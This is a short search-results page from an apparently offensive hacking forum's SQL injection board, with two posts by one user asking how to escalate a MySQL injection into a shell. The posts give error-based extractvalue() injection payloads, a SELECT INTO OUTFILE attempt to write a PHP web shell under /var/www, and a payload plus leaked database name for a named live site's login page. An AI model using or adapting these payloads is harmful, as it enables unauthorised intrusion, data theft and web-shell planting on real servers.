Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 1
Results 1 - 3 of 3
4 months ago
guantouqiang
for this: this can get data,but how to getshell id=99 and extractvalue(1, concat(0x5c, (select datanase())))-- can't this id=99 and extractvalue(1, concat(0x5c, (select '<?php system($_GET[1]);?>' into oufile '/var/www/god.php')))-- extractvalue() how to exploit "select into outfile" getshell
Forum: SQL and Code Injection
5 months ago
guantouqiang
http://ysts.39yst.com/2012/ login have mysql injection but only get some data,who can bypass this and select into outfile getshell MySQL Query : SELECT * FROM `pre_ucenter_members` WHERE `username`='1111' AND EXTRACTVALUE(4905,CONCAT(0x5c,0x7161757671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x717a666571)) AND 'YiBx'='YiBx' MySQL Error : XPATH syntax error: '\qauvq39yst_com_bbs
Forum: SQL and Code Injection
Current Page: 1 of 1